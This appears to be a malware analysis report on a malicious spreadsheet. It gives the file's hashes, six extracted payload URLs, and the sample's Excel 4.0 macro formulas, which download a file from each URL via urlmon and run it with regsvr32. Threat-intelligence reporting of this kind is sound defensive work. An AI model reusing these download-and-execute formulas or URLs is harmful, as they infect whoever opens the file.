General
-
Target
77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c
-
Size
43KB
-
MD5
b51c33433677367fc5cf4698f54005d1
-
SHA1
b1613ba78ba371eaeaecd9c29a768179eabd5afc
-
SHA256
77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c
-
SHA512
bc8baebfcda195174e26a695dcdcccc6318171109515ef69e7434be622921f87f0b5c00ee1c30721c3515979f0156422d0733667e577e2cc572bd81ee6957588
-
SSDEEP
768:gCgW/w0HGfdc/buIgsqlkVw2WFc8SGnCu2JBgBkXrI34gFHJneAWl2r49:tgWZmsb6yVwpFB1CuEge7tgnes89
Malware Config
Extracted
http://narsanatanaokulu.com/wp-includes/WQHhwTuSM5flyMv9/
http://www.beholdpublications.com/home/GCKnZAKB3zz1qnN/
https://ramijabali.com/licenses/44KGV1/
https://winnieswondersaviary.com/wp-content/BNzK17qzh1WQm/
http://vipwatchpay.com/Isoetales/Mvlqx9YifBDaHH6e/
https://rjssjharkhand.com/wp-content/ZddKK1KEaCO6BYbS/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://narsanatanaokulu.com/wp-includes/WQHhwTuSM5flyMv9/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/GCKnZAKB3zz1qnN/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ramijabali.com/licenses/44KGV1/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/BNzK17qzh1WQm/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vipwatchpay.com/Isoetales/Mvlqx9YifBDaHH6e/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/ZddKK1KEaCO6BYbS/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()
Signatures
Files
-
77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c